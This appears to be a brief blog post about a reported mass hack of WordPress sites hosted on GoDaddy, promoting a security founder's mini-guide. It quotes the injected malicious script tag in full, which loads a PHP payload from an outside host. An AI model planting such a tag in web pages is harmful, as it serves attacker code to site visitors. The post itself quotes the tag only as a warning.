Breaking News: Godaddy Hosting Hacked
I just received a telephone call from WP Security Lock founder, Regina Smola. Just this morning, thousands of wordpress sites are reported being hacked with a malicious script: <script src=”http://holasionweb.com/oo.php”></script>
I asked Regina why is it that people wait until something happens before they take the measures to secure their wordpress sites, here’s her response:
“most people do not put alarm systems in their homes until they’ve been robbed…”
So what makes it that much different when it comes to securing our internet homes?
It doesn’t.
Even though our businesses online are not like brick and mortar stores, it’s even more reason for us to secure our virtual property because of the dangerous threats of being ‘broke into’ or for a more understanding what of putting it, “hacked.”
Even more important is just because your wordpress site isn’t hosted on Godaddy, doesn’t mean you aren’t targeted for being hacked!
Regina wrote a small report entitled:

I encourage you to examine ways to keep bad hackers out of your WordPress site, with this is newly released mini-guide.
Having worked with Godaddy directly, Regina Smola and her team know exactly the steps to take to help us all keep our sites as safe as possible!
